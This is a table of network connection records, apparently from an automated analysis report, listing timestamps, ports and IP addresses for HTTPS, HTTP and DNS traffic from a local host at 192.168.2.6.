Mar 10, 2025 13:56:21.890393972 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.890414953 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.890444994 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.890455008 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.890584946 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.894391060 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.894529104 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.894702911 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.894714117 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.898536921 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.898663998 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.898673058 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.902529955 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.902582884 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.902590990 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.902605057 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.902708054 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.927284002 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.927321911 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.927525043 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.927531958 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.927565098 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.927589893 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.927711010 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.927721977 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.928025961 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.928092003 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.951565027 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.951590061 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.951622963 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.951631069 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.951658964 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.951735973 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.951939106 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.951987982 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.952020884 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.952100039 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.952107906 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.952970982 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.953006983 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.953023911 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.953032970 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.953095913 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.955766916 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.955823898 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.959278107 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.959307909 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.959508896 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.962912083 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.962965965 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.964138031 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.966638088 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.966702938 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.966717958 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.970345020 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.970375061 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.972065926 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.974097013 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.974658012 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.977772951 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.978178024 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.978187084 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.978681087 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.981399059 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.981426954 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.981556892 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.985011101 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.985084057 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.985161066 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.985169888 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.988790035 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.988816977 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.988847017 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.992516041 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.992556095 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.992573977 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.992635012 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.993151903 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.995878935 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.995940924 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.996052027 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:21.996059895 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.999351978 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:21.999407053 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:22.002439976 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:22.002455950 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:22.002500057 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:22.002510071 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:22.002580881 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:22.019542933 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:56:22.067078114 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:56:22.783035994 CET | 443 | 49713 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:22.783128977 CET | 443 | 49713 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:22.783174038 CET | 49713 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:22.784132004 CET | 49713 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:22.784152031 CET | 443 | 49713 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:22.784817934 CET | 443 | 49715 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:22.784903049 CET | 443 | 49715 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:22.784970999 CET | 49715 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:22.785000086 CET | 443 | 49715 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:22.785059929 CET | 443 | 49715 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:22.785099030 CET | 49715 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:22.785170078 CET | 49715 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:22.786130905 CET | 49715 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:22.786149025 CET | 443 | 49715 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:22.788091898 CET | 443 | 49717 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:22.788412094 CET | 49717 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:22.788420916 CET | 443 | 49717 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:22.788764954 CET | 443 | 49717 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:22.789184093 CET | 49717 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:22.789277077 CET | 443 | 49717 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:22.789504051 CET | 49717 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:22.796653032 CET | 443 | 49714 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:22.796684027 CET | 443 | 49714 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:22.796691895 CET | 443 | 49714 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:22.796720028 CET | 443 | 49714 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:22.796751976 CET | 443 | 49714 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:22.796991110 CET | 49714 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:22.797986031 CET | 49714 | 443 | 192.168.2.6 | 62.153.158.211 |
Mar 10, 2025 13:56:22.797998905 CET | 443 | 49714 | 62.153.158.211 | 192.168.2.6 |
Mar 10, 2025 13:56:22.832328081 CET | 443 | 49717 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:22.835609913 CET | 49717 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:23.369380951 CET | 443 | 49717 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:23.369409084 CET | 443 | 49717 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:23.369518995 CET | 443 | 49717 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:23.369680882 CET | 49717 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:23.370507956 CET | 49717 | 443 | 192.168.2.6 | 80.146.236.47 |
Mar 10, 2025 13:56:23.370529890 CET | 443 | 49717 | 80.146.236.47 | 192.168.2.6 |
Mar 10, 2025 13:56:26.233699083 CET | 49725 | 80 | 192.168.2.6 | 172.217.18.3 |
Mar 10, 2025 13:56:26.238794088 CET | 80 | 49725 | 172.217.18.3 | 192.168.2.6 |
Mar 10, 2025 13:56:26.238908052 CET | 49725 | 80 | 192.168.2.6 | 172.217.18.3 |
Mar 10, 2025 13:56:26.239062071 CET | 49725 | 80 | 192.168.2.6 | 172.217.18.3 |
Mar 10, 2025 13:56:26.244158030 CET | 80 | 49725 | 172.217.18.3 | 192.168.2.6 |
Mar 10, 2025 13:56:26.879218102 CET | 80 | 49725 | 172.217.18.3 | 192.168.2.6 |
Mar 10, 2025 13:56:26.885345936 CET | 49725 | 80 | 192.168.2.6 | 172.217.18.3 |
Mar 10, 2025 13:56:26.890409946 CET | 80 | 49725 | 172.217.18.3 | 192.168.2.6 |
Mar 10, 2025 13:56:27.070044994 CET | 80 | 49725 | 172.217.18.3 | 192.168.2.6 |
Mar 10, 2025 13:56:27.119122028 CET | 49725 | 80 | 192.168.2.6 | 172.217.18.3 |
Mar 10, 2025 13:56:28.259066105 CET | 443 | 49701 | 142.250.185.68 | 192.168.2.6 |
Mar 10, 2025 13:56:28.259186983 CET | 443 | 49701 | 142.250.185.68 | 192.168.2.6 |
Mar 10, 2025 13:56:28.259329081 CET | 49701 | 443 | 192.168.2.6 | 142.250.185.68 |
Mar 10, 2025 13:56:28.431308985 CET | 49701 | 443 | 192.168.2.6 | 142.250.185.68 |
Mar 10, 2025 13:56:28.431344986 CET | 443 | 49701 | 142.250.185.68 | 192.168.2.6 |
Mar 10, 2025 13:56:30.419420004 CET | 49678 | 443 | 192.168.2.6 | 20.42.65.91 |
Mar 10, 2025 13:57:06.007894039 CET | 49711 | 443 | 192.168.2.6 | 104.18.11.207 |
Mar 10, 2025 13:57:06.007921934 CET | 443 | 49711 | 104.18.11.207 | 192.168.2.6 |
Mar 10, 2025 13:57:07.023397923 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:57:07.023427010 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:57:16.680988073 CET | 49738 | 443 | 192.168.2.6 | 142.250.185.68 |
Mar 10, 2025 13:57:16.681035995 CET | 443 | 49738 | 142.250.185.68 | 192.168.2.6 |
Mar 10, 2025 13:57:16.681099892 CET | 49738 | 443 | 192.168.2.6 | 142.250.185.68 |
Mar 10, 2025 13:57:16.681473970 CET | 49738 | 443 | 192.168.2.6 | 142.250.185.68 |
Mar 10, 2025 13:57:16.681488991 CET | 443 | 49738 | 142.250.185.68 | 192.168.2.6 |
Mar 10, 2025 13:57:18.702368021 CET | 443 | 49738 | 142.250.185.68 | 192.168.2.6 |
Mar 10, 2025 13:57:18.704721928 CET | 49738 | 443 | 192.168.2.6 | 142.250.185.68 |
Mar 10, 2025 13:57:18.704761028 CET | 443 | 49738 | 142.250.185.68 | 192.168.2.6 |
Mar 10, 2025 13:57:18.705988884 CET | 443 | 49738 | 142.250.185.68 | 192.168.2.6 |
Mar 10, 2025 13:57:18.709084988 CET | 49738 | 443 | 192.168.2.6 | 142.250.185.68 |
Mar 10, 2025 13:57:18.709285975 CET | 443 | 49738 | 142.250.185.68 | 192.168.2.6 |
Mar 10, 2025 13:57:18.758187056 CET | 49738 | 443 | 192.168.2.6 | 142.250.185.68 |
Mar 10, 2025 13:57:21.054847956 CET | 443 | 49681 | 2.23.227.215 | 192.168.2.6 |
Mar 10, 2025 13:57:21.054999113 CET | 443 | 49681 | 2.23.227.215 | 192.168.2.6 |
Mar 10, 2025 13:57:21.055038929 CET | 49681 | 443 | 192.168.2.6 | 2.23.227.215 |
Mar 10, 2025 13:57:21.055073977 CET | 49681 | 443 | 192.168.2.6 | 2.23.227.215 |
Mar 10, 2025 13:57:27.727370977 CET | 49725 | 80 | 192.168.2.6 | 172.217.18.3 |
Mar 10, 2025 13:57:27.732909918 CET | 80 | 49725 | 172.217.18.3 | 192.168.2.6 |
Mar 10, 2025 13:57:27.733012915 CET | 49725 | 80 | 192.168.2.6 | 172.217.18.3 |
Mar 10, 2025 13:57:28.392561913 CET | 443 | 49738 | 142.250.185.68 | 192.168.2.6 |
Mar 10, 2025 13:57:28.392718077 CET | 443 | 49738 | 142.250.185.68 | 192.168.2.6 |
Mar 10, 2025 13:57:28.392810106 CET | 49738 | 443 | 192.168.2.6 | 142.250.185.68 |
Mar 10, 2025 13:57:28.541870117 CET | 49738 | 443 | 192.168.2.6 | 142.250.185.68 |
Mar 10, 2025 13:57:28.541917086 CET | 443 | 49738 | 142.250.185.68 | 192.168.2.6 |
Mar 10, 2025 13:57:51.023480892 CET | 49711 | 443 | 192.168.2.6 | 104.18.11.207 |
Mar 10, 2025 13:57:51.023510933 CET | 443 | 49711 | 104.18.11.207 | 192.168.2.6 |
Mar 10, 2025 13:57:52.023535967 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:57:52.023555994 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:58:20.921092987 CET | 443 | 49711 | 104.18.11.207 | 192.168.2.6 |
Mar 10, 2025 13:58:20.921242952 CET | 49711 | 443 | 192.168.2.6 | 104.18.11.207 |
Mar 10, 2025 13:58:20.921482086 CET | 49711 | 443 | 192.168.2.6 | 104.18.11.207 |
Mar 10, 2025 13:58:20.921504021 CET | 443 | 49711 | 104.18.11.207 | 192.168.2.6 |
Mar 10, 2025 13:58:21.720778942 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:58:21.720890045 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:58:21.721146107 CET | 49709 | 443 | 192.168.2.6 | 172.67.41.16 |
Mar 10, 2025 13:58:21.721167088 CET | 443 | 49709 | 172.67.41.16 | 192.168.2.6 |
Mar 10, 2025 13:58:42.593998909 CET | 52431 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:42.599026918 CET | 53 | 52431 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:42.599153996 CET | 52431 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:42.599183083 CET | 52431 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:42.604185104 CET | 53 | 52431 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:43.082392931 CET | 53 | 52431 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:43.083336115 CET | 52431 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:43.085968018 CET | 52432 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:43.086018085 CET | 443 | 52432 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:43.086133003 CET | 52432 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:43.086324930 CET | 52433 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:43.086378098 CET | 443 | 52433 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:43.086431026 CET | 52433 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:43.086709976 CET | 52432 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:43.086724043 CET | 443 | 52432 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:43.087094069 CET | 52433 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:43.087110996 CET | 443 | 52433 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:43.090691090 CET | 53 | 52431 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:43.090749979 CET | 52431 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:44.983753920 CET | 443 | 52433 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:44.984316111 CET | 52433 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:44.984345913 CET | 443 | 52433 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:44.985341072 CET | 443 | 52433 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:44.985423088 CET | 52433 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:44.986629009 CET | 52433 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:44.986681938 CET | 443 | 52433 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:44.986933947 CET | 52433 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:44.986942053 CET | 443 | 52433 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:45.001384020 CET | 443 | 52432 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:45.001727104 CET | 52432 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:45.001743078 CET | 443 | 52432 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:45.002815008 CET | 443 | 52432 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:45.002887011 CET | 52432 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:45.003247023 CET | 52432 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:45.003302097 CET | 443 | 52432 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:45.003403902 CET | 52432 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:45.003415108 CET | 443 | 52432 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:45.039210081 CET | 52433 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:45.054884911 CET | 52432 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:45.472681046 CET | 443 | 52433 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:45.473409891 CET | 52433 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:45.473460913 CET | 443 | 52433 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:45.473510027 CET | 52433 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:45.514771938 CET | 443 | 52432 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:45.515513897 CET | 52432 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:45.515558004 CET | 443 | 52432 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:45.515719891 CET | 52432 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:54.544303894 CET | 52434 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:54.544357061 CET | 443 | 52434 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:54.544416904 CET | 52434 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:54.544800043 CET | 52434 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:54.544811010 CET | 443 | 52434 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:56.483382940 CET | 443 | 52434 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:56.483747005 CET | 52434 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:56.483767033 CET | 443 | 52434 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:56.485017061 CET | 443 | 52434 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:56.485162020 CET | 52434 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:56.485529900 CET | 52434 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:56.485605001 CET | 443 | 52434 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:56.485836029 CET | 52434 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:56.485843897 CET | 443 | 52434 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:56.485869884 CET | 52434 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:56.532341957 CET | 443 | 52434 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:56.539544106 CET | 52434 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:56.977972984 CET | 443 | 52434 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:56.978486061 CET | 52434 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:58:56.978535891 CET | 443 | 52434 | 142.251.116.94 | 192.168.2.6 |
Mar 10, 2025 13:58:56.978610992 CET | 52434 | 443 | 192.168.2.6 | 142.251.116.94 |
Mar 10, 2025 13:59:25.837412119 CET | 49679 | 443 | 192.168.2.6 | 20.191.45.158 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Mar 10, 2025 13:56:12.359579086 CET | 53 | 58051 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:56:12.440768957 CET | 61230 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:56:12.440937042 CET | 59151 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:56:12.447379112 CET | 53 | 61720 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:56:12.567388058 CET | 53 | 61230 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:56:12.695519924 CET | 53 | 59151 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:56:15.854312897 CET | 53 | 61691 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:56:15.978823900 CET | 53 | 65105 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:56:16.618657112 CET | 64356 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:56:16.618815899 CET | 60679 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:56:16.626003981 CET | 53 | 60679 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:56:16.626147032 CET | 53 | 64356 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:56:16.964190960 CET | 58784 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:56:16.964437962 CET | 59379 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:56:16.965164900 CET | 50270 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:56:16.965313911 CET | 51272 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:56:16.965759039 CET | 62766 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:56:16.965904951 CET | 50008 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:56:16.966315985 CET | 64560 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:56:16.966475010 CET | 60792 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:56:16.966839075 CET | 59724 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:56:16.966974974 CET | 65422 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:56:16.967350006 CET | 56701 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:56:16.967514038 CET | 54544 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:56:16.971522093 CET | 53 | 59379 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:56:16.971725941 CET | 53 | 58784 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:56:16.972110987 CET | 53 | 50270 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:56:16.973232031 CET | 53 | 51272 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:56:16.973364115 CET | 53 | 50008 | 1.1.1.1 | 192.168.2.6 |
